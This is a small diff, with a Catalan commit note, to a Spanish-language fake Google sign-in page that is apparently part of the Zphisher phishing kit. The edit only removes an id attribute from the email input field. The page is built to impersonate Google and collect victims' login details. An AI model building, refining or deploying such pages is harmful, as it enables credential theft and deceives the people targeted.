modificació del css 25/04 a les 12:52

--- a/zphisher-master/.sites/google_new/email.html
+++ b/zphisher-master/.sites/google_new/email.html
@@ -17,7 +17,7 @@
         <h1>Iniciar sesión</h1>
         <h4>Utiliza tu cuenta de Google</h4>
         <br>
-        <input type="email" id="email" name="username" placeholder="Correo electrónico o teléfono" required>
+        <input type="email" name="username" placeholder="Correo electrónico o teléfono" required>
         <br>
         <br>
         <p>¿No es tu ordenador? Usa el modo invitado para iniciar sesión de forma privada. <a>Más información</a></p>
